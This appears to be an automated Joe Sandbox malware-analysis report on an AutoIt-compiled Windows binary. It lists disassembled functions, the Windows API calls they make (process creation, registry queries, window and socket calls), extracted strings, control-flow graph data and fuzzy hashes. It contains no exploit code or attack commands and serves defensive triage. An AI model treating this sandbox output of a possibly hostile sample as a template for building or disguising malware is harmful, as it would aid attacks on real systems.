                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                        • String ID:
                                        • API String ID: 2395222682-0
                                        • Opcode ID: 594d8656f8e3454a5ad9bafb02b1065a855942456e1c6aee281f61a42793d97f
                                        • Instruction ID: a466908ea7c17df7eacec2aa6371fc08dbd92637dd57fd101981c2158112e3c8
                                        • Opcode Fuzzy Hash: 594d8656f8e3454a5ad9bafb02b1065a855942456e1c6aee281f61a42793d97f
                                        • Instruction Fuzzy Hash: 5BC11371608305EFC710DF64C889A2AB7E9FF89354F00891DF98A9B251DB79ED05CB92
                                        Function 00772F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00772F8B
                                        • RegisterClassExW.USER32(00000030), ref: 00772FB5
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00772FC6
                                        • LoadIconW.USER32(000000A9), ref: 00773009
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 975902462-1005189915
                                        • Opcode ID: 4ce2412afc814a3d8eea5feb2d63f91879f83c8ecb55b0bd84f9cceb76dee447
                                        • Instruction ID: 90d044c8ef3554c3e18b5542f23bc3f634c89e640e6da6b9df97acdd6bf0beac
                                        • Opcode Fuzzy Hash: 4ce2412afc814a3d8eea5feb2d63f91879f83c8ecb55b0bd84f9cceb76dee447
                                        • Instruction Fuzzy Hash: 6121C5B5900318AFDF10AF94EC49BDDBBF5FB08B00F00852AF615A62A0D7B84544CFA9
                                        Function 007D23C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1431 7d23c5-7d2426 call 791970 1434 7d2428-7d243b call 77cdb4 1431->1434 1435 7d2452-7d2456 1431->1435 1443 7d243d-7d2450 call 77cdb4 1434->1443 1444 7d2488 1434->1444 1437 7d249d-7d24a3 1435->1437 1438 7d2458-7d2468 call 77cdb4 1435->1438 1440 7d24b8-7d24be 1437->1440 1441 7d24a5-7d24a8 1437->1441 1452 7d246b-7d2484 call 77cdb4 1438->1452 1446 7d24c8-7d24e2 call 7784a6 call 773bcf 1440->1446 1447 7d24c0 1440->1447 1445 7d24ab-7d24b0 call 77cdb4 1441->1445 1443->1452 1453 7d248b-7d248f 1444->1453 1445->1440 1464 7d24e8-7d2541 call 7784a6 call 773bcf call 7784a6 call 773bcf call 7784a6 call 773bcf 1446->1464 1465 7d25a1-7d25a9 1446->1465 1447->1446 1452->1437 1463 7d2486 1452->1463 1458 7d2499-7d249b 1453->1458 1459 7d2491-7d2497 1453->1459 1458->1437 1458->1440 1459->1445 1463->1453 1512 7d256f-7d259f GetSystemDirectoryW call 79010a GetSystemDirectoryW 1464->1512 1513 7d2543-7d255e call 7784a6 call 773bcf 1464->1513 1466 7d25ab-7d25c6 call 7784a6 call 773bcf 1465->1466 1467 7d25d3-7d2601 GetCurrentDirectoryW call 79010a GetCurrentDirectoryW 1465->1467 1466->1467 1484 7d25c8-7d25d1 call 7918fb 1466->1484 1475 7d2605 1467->1475 1478 7d2609-7d260d 1475->1478 1481 7d260f-7d2639 call 77ca8e * 3 1478->1481 1482 7d263e-7d264e call 7b9a8f 1478->1482 1481->1482 1495 7d26aa 1482->1495 1496 7d2650-7d269b call 7ba17a call 7ba073 call 7ba102 1482->1496 1484->1467 1484->1482 1497 7d26ac-7d26bb 1495->1497 1496->1497 1526 7d269d-7d26a8 1496->1526 1501 7d274c-7d2768 CreateProcessW 1497->1501 1502 7d26c1-7d26f1 call 7abc90 call 7918fb 1497->1502 1508 7d276b-7d277e call 79017e * 2 1501->1508 1527 7d26fa-7d270a call 7918fb 1502->1527 1528 7d26f3-7d26f8 1502->1528 1530 7d27bd-7d27c9 CloseHandle 1508->1530 1531 7d2780-7d27b8 call 7bd7e4 GetLastError call 777ba9 call 782570 1508->1531 1512->1475 1513->1512 1538 7d2560-7d2569 call 7918fb 1513->1538 1526->1497 1544 7d270c-7d2711 1527->1544 1545 7d2713-7d2723 call 7918fb 1527->1545 1528->1527 1528->1528 1535 7d27cb-7d27f0 call 7b9d09 call 7ba37f call 7d2881 1530->1535 1536 7d27f5-7d27f9 1530->1536 1546 7d283e-7d284f call 7b9b29 1531->1546 1535->1536 1539 7d27fb-7d2805 1536->1539 1540 7d2807-7d2811 1536->1540 1538->1478 1538->1512 1539->1546 1549 7d2819-7d2838 call 782570 CloseHandle 1540->1549 1550 7d2813 1540->1550 1544->1544 1544->1545 1558 7d272c-7d274a call 79017e * 3 1545->1558 1559 7d2725-7d272a 1545->1559 1549->1546 1550->1549 1558->1508 1559->1558 1559->1559
                                        APIs
                                        • _memset.LIBCMT ref: 007D23E6
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007D2579
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007D259D
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007D25DD
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007D25FF
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007D2760
                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007D2792
                                        • CloseHandle.KERNEL32(?), ref: 007D27C1
                                        • CloseHandle.KERNEL32(?), ref: 007D2838
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                        • String ID:
                                        • API String ID: 4090791747-0
                                        • Opcode ID: 567bfce6abd3aa4cb71f66af61acf936d9e8e80cbf76a87a72ff6e97dacb940d
                                        • Instruction ID: 15c976a65d49472c626f526fdaadb2154e0aaaa22af77184fbeceb0717e64a16
                                        • Opcode Fuzzy Hash: 567bfce6abd3aa4cb71f66af61acf936d9e8e80cbf76a87a72ff6e97dacb940d
                                        • Instruction Fuzzy Hash: 4FD1A231604301DFCB25EF24D895A6ABBF1AF95350F14845EF8999B3A2DB38DC42CB52
                                        Function 007CC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1572 7cc8b7-7cc8f1 1573 7cccfb-7cccff 1572->1573 1574 7cc8f7-7cc8fa 1572->1574 1576 7ccd04-7ccd05 1573->1576 1574->1573 1575 7cc900-7cc903 1574->1575 1575->1573 1577 7cc909-7cc912 call 7ccff8 1575->1577 1578 7ccd06 call 7cc235 1576->1578 1583 7cc914-7cc920 1577->1583 1584 7cc925-7cc92e call 7bbe14 1577->1584 1582 7ccd0b-7ccd0f 1578->1582 1583->1578 1587 7cc934-7cc93a 1584->1587 1588 7ccc61-7ccc6c call 77d2c0 1584->1588 1589 7cc93c-7cc93e 1587->1589 1590 7cc940 1587->1590 1596 7ccc6e-7ccc72 1588->1596 1597 7ccca9-7cccb4 call 77d2c0 1588->1597 1592 7cc942-7cc94a 1589->1592 1590->1592 1594 7cccec-7cccf4 1592->1594 1595 7cc950-7cc967 call 7aabf3 1592->1595 1594->1573 1605 7cc969-7cc96e 1595->1605 1606 7cc973-7cc97f 1595->1606 1598 7ccc78 1596->1598 1599 7ccc74-7ccc76 1596->1599 1597->1594 1608 7cccb6-7cccba 1597->1608 1602 7ccc7a-7ccc98 call 78d6b4 call 7b97b6 1598->1602 1599->1602 1624 7ccc99-7ccca7 call 7bd7e4 1602->1624 1605->1576 1609 7cc9ce-7cc9f9 call 78fa89 1606->1609 1610 7cc981-7cc98d 1606->1610 1612 7cccbc-7cccbe 1608->1612 1613 7cccc0 1608->1613 1625 7cca18-7cca1a 1609->1625 1626 7cc9fb-7cca16 call 78ac65 1609->1626 1610->1609 1615 7cc98f-7cc99c call 7aa8c8 1610->1615 1614 7cccc2-7cccea call 78d6b4 call 7b503c call 782570 1612->1614 1613->1614 1614->1624 1623 7cc9a1-7cc9a6 1615->1623 1623->1609 1629 7cc9a8-7cc9af 1623->1629 1624->1582 1627 7cca1d-7cca24 1625->1627 1626->1627 1633 7cca26-7cca30 1627->1633 1634 7cca52-7cca59 1627->1634 1636 7cc9be-7cc9c5 1629->1636 1637 7cc9b1-7cc9b8 1629->1637 1639 7cca32-7cca48 call 7aa25b 1633->1639 1642 7ccadf-7ccaec 1634->1642 1643 7cca5f-7cca66 1634->1643 1636->1609 1644 7cc9c7 1636->1644 1637->1636 1641 7cc9ba 1637->1641 1654 7cca4a-7cca50 1639->1654 1641->1636 1645 7ccaee-7ccaf8 1642->1645 1646 7ccafb-7ccb28 VariantInit call 791970 1642->1646 1643->1642 1649 7cca68-7cca7b 1643->1649 1644->1609 1645->1646 1658 7ccb2d-7ccb30 1646->1658 1659 7ccb2a-7ccb2b 1646->1659 1652 7cca7c-7cca84 1649->1652 1655 7cca86-7ccaa3 VariantClear 1652->1655 1656 7ccad1-7ccada 1652->1656 1654->1634 1660 7ccabc-7ccacc 1655->1660 1661 7ccaa5-7ccab9 SysAllocString 1655->1661 1656->1652 1657 7ccadc 1656->1657 1657->1642 1662 7ccb31-7ccb43 1658->1662 1659->1662 1660->1656 1663 7ccace 1660->1663 1661->1660 1664 7ccb47-7ccb4c 1662->1664 1663->1656 1665 7ccb4e-7ccb52 1664->1665 1666 7ccb8a-7ccb8c 1664->1666 1669 7ccb54-7ccb86 1665->1669 1670 7ccba1-7ccba5 1665->1670 1667 7ccb8e-7ccb95 1666->1667 1668 7ccbb4-7ccbd5 call 7bd7e4 call 7ba6f6 1666->1668 1667->1670 1671 7ccb97-7ccb9f 1667->1671 1678 7ccc41-7ccc50 VariantClear 1668->1678 1682 7ccbd7-7ccbe0 1668->1682 1669->1666 1672 7ccba6-7ccbaf call 7cc235 1670->1672 1671->1672 1672->1678 1680 7ccc5a-7ccc5c 1678->1680 1681 7ccc52-7ccc55 call 7b1693 1678->1681 1680->1582 1681->1680 1684 7ccbe2-7ccbef 1682->1684 1685 7ccc38-7ccc3f 1684->1685 1686 7ccbf1-7ccbf8 1684->1686 1685->1678 1685->1684 1687 7ccbfa-7ccc0a 1686->1687 1688 7ccc26-7ccc2a 1686->1688 1687->1685 1691 7ccc0c-7ccc14 1687->1691 1689 7ccc2c-7ccc2e 1688->1689 1690 7ccc30 1688->1690 1693 7ccc32-7ccc33 call 7ba6f6 1689->1693 1690->1693 1691->1688 1692 7ccc16-7ccc1c 1691->1692 1692->1688 1694 7ccc1e-7ccc24 1692->1694 1693->1685 1694->1685 1694->1688
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: 8c41f6457afe904dfce7b69f97490e4c0dc0a85093c1faea28d7657d74182e29
                                        • Instruction ID: 8d6bfcf1dfb5fd08ffc1abf618fd45d621d8150b367cee9fd98345551a7cc4cf
                                        • Opcode Fuzzy Hash: 8c41f6457afe904dfce7b69f97490e4c0dc0a85093c1faea28d7657d74182e29
                                        • Instruction Fuzzy Hash: 81E1A2B1A00219ABDF21DFA4C895FAE77B9FF48354F14802DE949A7281D778ED41CB60
                                        Function 007CBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1696 7cbf80-7cbfe1 call 791970 1699 7cc21b-7cc21d 1696->1699 1700 7cbfe7-7cbfeb 1696->1700 1701 7cc21e-7cc21f 1699->1701 1700->1699 1702 7cbff1-7cbff6 1700->1702 1703 7cc224-7cc226 1701->1703 1702->1699 1704 7cbffc-7cc00b call 7bbe14 1702->1704 1705 7cc227 1703->1705 1709 7cc158-7cc15c 1704->1709 1710 7cc011-7cc015 1704->1710 1707 7cc229 call 7cc235 1705->1707 1716 7cc22e-7cc232 1707->1716 1714 7cc16d 1709->1714 1715 7cc15e-7cc160 1709->1715 1712 7cc01b 1710->1712 1713 7cc017-7cc019 1710->1713 1717 7cc01d-7cc01f 1712->1717 1713->1717 1718 7cc16f-7cc171 1714->1718 1715->1718 1719 7cc021-7cc025 1717->1719 1720 7cc033-7cc03e 1717->1720 1718->1701 1721 7cc177-7cc17b 1718->1721 1719->1720 1722 7cc027-7cc031 1719->1722 1720->1705 1723 7cc17d-7cc17f 1721->1723 1724 7cc181 1721->1724 1722->1720 1726 7cc043-7cc05f 1722->1726 1725 7cc183-7cc186 1723->1725 1724->1725 1727 7cc188-7cc18e 1725->1727 1728 7cc193-7cc197 1725->1728 1733 7cc067-7cc081 1726->1733 1734 7cc061-7cc065 1726->1734 1727->1703 1729 7cc19d 1728->1729 1730 7cc199-7cc19b 1728->1730 1732 7cc19f-7cc1c9 VariantInit VariantClear 1729->1732 1730->1732 1740 7cc1cb-7cc1cd 1732->1740 1741 7cc1e6-7cc1ea 1732->1741 1742 7cc089 1733->1742 1743 7cc083-7cc087 1733->1743 1734->1733 1735 7cc090-7cc0e5 call 78fa89 VariantInit call 791a00 1734->1735 1758 7cc108-7cc10d 1735->1758 1759 7cc0e7-7cc0f1 1735->1759 1740->1741 1744 7cc1cf-7cc1e1 call 782570 1740->1744 1745 7cc1ec-7cc1ee 1741->1745 1746 7cc1f0-7cc1fe call 782570 1741->1746 1742->1735 1743->1735 1743->1742 1757 7cc0fb-7cc0fe 1744->1757 1745->1746 1750 7cc201-7cc219 call 7ba6f6 VariantClear 1745->1750 1746->1750 1750->1716 1757->1707 1762 7cc10f-7cc131 1758->1762 1763 7cc162-7cc16b 1758->1763 1760 7cc103-7cc106 1759->1760 1761 7cc0f3-7cc0fa 1759->1761 1760->1757 1761->1757 1766 7cc13b-7cc13d 1762->1766 1767 7cc133-7cc139 1762->1767 1763->1757 1768 7cc141-7cc157 call 7ba6f6 1766->1768 1767->1757 1768->1709
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$_memset
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2862541840-625585964
                                        • Opcode ID: 18670fea7f23c07476f24ae8d487e01611a00387348cb8cc427c6a9d9394df41
                                        • Instruction ID: 2e3a48c81c6975b962fff7531c0f0253e06683a6569e1631c0a4bcfd086e5e4f
                                        • Opcode Fuzzy Hash: 18670fea7f23c07476f24ae8d487e01611a00387348cb8cc427c6a9d9394df41
                                        • Instruction Fuzzy Hash: DF91AEB1A00219EBCF25CFA5DC48FAEB7B8EF45710F14815DE919AB281D7789941CBA0
                                        Function 00773DCB Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00773F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007734E2,?,00000001), ref: 00773FCD
                                        • _free.LIBCMT ref: 007E3C27
                                        • _free.LIBCMT ref: 007E3C6E
                                          • Part of subcall function 0077BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,008322E8,?,00000000,?,00773E2E,?,00000000,?,0080DBF0,00000000,?), ref: 0077BE8B
                                          • Part of subcall function 0077BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00773E2E,?,00000000,?,0080DBF0,00000000,?,00000002), ref: 0077BEA7
                                          • Part of subcall function 0077BDF0: __wsplitpath.LIBCMT ref: 0077BF19
                                          • Part of subcall function 0077BDF0: _wcscpy.LIBCMT ref: 0077BF31
                                          • Part of subcall function 0077BDF0: _wcscat.LIBCMT ref: 0077BF46
                                          • Part of subcall function 0077BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0077BF56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<w$G-w
                                        • API String ID: 1510338132-3880194010
                                        • Opcode ID: b667bbab0823e678fa5450439eb6a40e033a9952700192f34d9f1dd090d4387b
                                        • Instruction ID: 83b290efbefe7a2b13391f52b8c2560bd7454457ea31fac8bedbb2be21409da9
                                        • Opcode Fuzzy Hash: b667bbab0823e678fa5450439eb6a40e033a9952700192f34d9f1dd090d4387b
                                        • Instruction Fuzzy Hash: DF915071911259EFCF04EFA5CC599EE77B4BF08350F10842AF416EB291DB789A45CB50
                                        Function 0078EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0078EADA,?,?), ref: 0078EB27
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0078EADA,?,?), ref: 007E4B26
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0078EADA,?,?), ref: 007E4B65
                                        • RegCloseKey.ADVAPI32(?,?,0078EADA,?,?), ref: 007E4B94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: QueryValue$CloseOpen
                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                        • API String ID: 1586453840-614718249
                                        • Opcode ID: 12037a25c973b08b9c11ccfac86477982e6f276711320843294fe67420ba1fde
                                        • Instruction ID: 0bfbbbad13f254442bb932e4277f032f7eebe36c28e55db4eac364c35759871b
                                        • Opcode Fuzzy Hash: 12037a25c973b08b9c11ccfac86477982e6f276711320843294fe67420ba1fde
                                        • Instruction Fuzzy Hash: F4114F71601208BEEF149BA4DD86EBE77BCEF04354F104059F506E6191EA789E41DB54
                                        Function 00772E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00772ECB
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00772EEC
                                        • ShowWindow.USER32(00000000), ref: 00772F00
                                        • ShowWindow.USER32(00000000), ref: 00772F09
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: cc5e78657cdec68fd25d89ad9aaa90ff7a7e8f9f7808cc8a910515e1cde26a24
                                        • Instruction ID: 73e11dcf9d8e52eeb887564c4e76537685aecb7972f11894077ac7ae112cf813
                                        • Opcode Fuzzy Hash: cc5e78657cdec68fd25d89ad9aaa90ff7a7e8f9f7808cc8a910515e1cde26a24
                                        • Instruction Fuzzy Hash: 40F030706406D07AEB3057576C5CE772E7EF7C6F60F01441EBA04D21A0C2650885DAB0
                                        Function 007C936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 007C9409
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9416
                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 007C943A
                                        • _strlen.LIBCMT ref: 007C9484
                                        • _memmove.LIBCMT ref: 007C94CA
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C94F7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_memmove_strlenselect
                                        • String ID:
                                        • API String ID: 2795762555-0
                                        • Opcode ID: 0bf68db129e1443b4a5c918f6eb51c747f9e4cbcd0a56a00a4a4a25c4d7b5c5a
                                        • Instruction ID: e5de815e57bf59d204047ce1a066118a23cd1c97af6c030e1536e3d4475c1f05
                                        • Opcode Fuzzy Hash: 0bf68db129e1443b4a5c918f6eb51c747f9e4cbcd0a56a00a4a4a25c4d7b5c5a
                                        • Instruction Fuzzy Hash: 0B413475500144EFCB58EB64CD99FAEB7B9EF48310F10815DF51A97291DB389E41CB60
                                        Function 007B6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00773B1E: _wcsncpy.LIBCMT ref: 00773B32
                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 007B6DBA
                                        • GetLastError.KERNEL32 ref: 007B6DC5
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007B6DD9
                                        • _wcsrchr.LIBCMT ref: 007B6DFB
                                          • Part of subcall function 007B6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 007B6E31
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
